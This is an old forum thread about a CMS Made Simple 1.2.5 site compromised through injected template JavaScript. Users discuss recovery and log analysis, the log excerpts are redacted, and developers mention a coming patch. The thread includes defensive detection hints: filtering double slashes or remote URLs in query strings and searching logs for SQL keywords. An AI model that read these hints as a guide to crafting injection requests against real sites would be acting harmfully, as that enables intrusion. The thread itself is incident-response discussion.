My site was hacked - while running 1.2.5

[Jack @ PharSide]

Hate to say it guys but 1.2.5 is not safe and we should all be aware of this one. I was hacked on that version but was able to recoup fairly fast due to good backups. It is a hassle though. It was the same admin hack I believe that people have been seeing in the 1.2.4 or earlier versions. It was the one where you went to login via the admin and there were about 5-6 errors above it. I can't remember what it said as I tried to rebuild the site fast but I hope this post helps.

THIS WAS DEF A CMSMS HACK - NO OTHER FILES, DBs OR PASSWORDS HAVE BEEN CHANGED OR STOLEN.

WHAT WAS AFFECTED:
When I noticed it, the fonts were larger than normal on the front end which was a small but but absolutely odd. At that point, I logged in to see if something was off with my CSS and I noticed the admin login page had an error message people were getting on the last version when the admin panel had been comp'd. I can't remember what the error was but it was in the forum at the time I researched it so I didn't bother documenting. On the fresh install, I immediately changed the location of the admin folder and of course all login info. After looking into with minimal time, I noticed that they were able to place a nonsense javascript in the head of all of the templates which was blowing out the page formatting (but the site still worked overall) and I am sure some modules/scripts if I dug further.

When I logged into the admin, I noticed a lot of modules that use tab interfaces within the admin were no longer working. The same tag had to be blowing out the admin pages as well. Needless to say, without the tabs working - CMSMS admin is inoperable.

MY TAKE:
This was def a CMSMS hack specifically. I wouldn't be surprised if this clown searched Google for Powered by CMSMS and attacked form there. The bottom line: he couldn't do much but insert some hidden files (that I could not locate) and call them from the head of the of the templates. Everything else was intact and the site still fully operated with NO visual errors other than the larger than normal text (for the most part)? It was as if they javascript he inserted was partially erroring out some formatting. But overall, the site was fully functional and oddly enough - 90% of the styles worked correctly.

Thanks guys and I wish I saved more info. Unfort - this was my live consulting website so when I realized I could not fix what was there, I completely reuploaded and relaunched. Unfort - this will happen again and next time I will save some code/screens.

-Jack

[tinhat]

Can you get access to the web server log? It would be a good idea to grab that. It could help find out where the exploit is.

[Nullig]

Had you been hacked with 1.2.4 and updated to 1.2.5?
When you did the fresh install, did you blow away the db and use a "clean" backup?
When you did the fresh install, did you completely wipe all files/directories from the site root, or just overwrite them with the 1.2.5 files?

Nullig

[calguy1000]

As I said in the previous thread... if this is a new issue we need more information about it.

Please analize your httpd access logs to see how and when somebody hacked your site.

[blast2007]

Can you post other infos like:

- PHP version #
- Apache version #
- List of CMSMS modules installed while hacked and version #
- Did you apply any hints of "A small guide to CMSMS system security" ?

Regards
blast

[Pierre M.]

Hello,

It was the same admin hack I believe that people have been seeing in the 1.2.4 or earlier versions.

It would be good news as it is easyly prevented by small URL filtering.

It needs to be confirmed. Please, as written above, dig in your http logS "to see how and when somebody hacked your site", "It could help find out where the exploit is."

Pierre M.

[Jack @ PharSide]

As I said in the previous thread... if this is a new issue we need more information about it.

Please analize your httpd access logs to see how and when somebody hacked your site.

That is precisely why I posted and I assumed people would have questions. When this happened, so much was going through my mind as IT WAS MY SITE, that I just didn't do a good enough job documenting. However, when I searched the forums with the error message - it was here so I also thought most people would be familiar. With that ebing said - I did the best I could my initial post.

So, to answer some of the questions:

INSTALL HISTORY
The original install of the site was back in Dec. I can't remember the specific release. Then as new upgrades were announced, I installed them within the first week as I am always very active on CMSmadesimple.org and the forums. So over time, this site went through 2-4 upgrades. Then immediately as 1.2.5 was released, again without hesitation I upgraded. I am not sure of the exact date of 1.2.5 but I did not have any hack problem before or after the upgrade until last Thursday.

DATABASE AND REMOVAL PROCESS FOR THIS PARTICULAR SCENARIO:
I am always better with database backups with clients but I had one that was a few months old for me. So, instead of 86'ing the DB, I decided to create a sub domain and do a fresh install of v1.2.5. Once I had that, I switch the database to my live site and everything worked perfectly. The javascript and all errors were gone. Some how they are finding a way to include this file in the header without messing with the DB. The interesting things is I tried to remove and reupload the admin prior to anything and that obviously DID NOT WORK.

Here are the steps I took to remove it completely in short:
1. Tested DB and new sub domain install
2. Forwarded traffic off to a 15 minute closed splash
3. Deleted every file in root directory
4. Uploaded a fresh copy of all files
5. Added recommended security
6. Changed the admin directory to something outrageously hard to find
7. Changed password to something I forget all the time

Other than uploading time - this would not be too hard of a task if I had good backups. Keep good backups all and even if people find holes in this or any system, you can be back up and running in 10-20 minutes if you keep good backups. I have learned that first hand. Total time wasted testing and reinstalling = 2.5 hours - thanks a**hole

I just got back this morning from a trip so I haven't had time to grab the logs. I am not that familiar with what I am looking for there but I am sure you all will help me. I am not a "server guy" although very technical. I will try and post this later today as my Monday schedule clears a little. I post all server info, modules installed, log files, and so on that I can find. Any ideas on what I should be looking for within the logfiles would be appreciate.

Thanks all and I hope I can help here and am certainly willing to furnish what we need to fix it.

Cheers,
-J

[Pierre M.]

May be there are stars in the requests. Search for stars or http or union (or other SQL keywords) in query string, pay attention for the large requests.

Pierre M.

[kermit]

Any ideas on what I should be looking for within the logfiles would be appreciate.

here's the most recent (failed, due to htaccess url filtering) hack attempts we've seen..

the most obvious thing to look for is URLs to other sites in the requested URLs. you'll note every entry below has one.

Code: Select all

xxxxxxxxxxxxxxxxxx

note: IPs and timestamps have portions XX'd out.. so does an actual portion of a URL as that string would've positively identified (#1 result on google) the site the logs were from.

[Jack @ PharSide]

Based on the dates, I don't think these are related but I thought this one might be interesting to show everyone. I am still working on all other info - just wanted to see if anyone thought this might be an attempt of some kind.  Or maybe a past attempt. I have 6 times as many lines as the forum will allow me to post.

Code: Select all

xxxxxxxxxxxxxxxxxxxx

[Pierre M.]

It seems the double slash // in query string is a good filter candidate. I have it in my setups.

Pierre

[calguy1000]

I think Ted and I are planning a CMS 1.3.1.  There may still be a vulnerability in the java postlet stuff, so it'll either be fixed once and for all, or dropped.  Also, there's a fix to the installer, and a few more minor changes that will come out with this.

Stay tuned.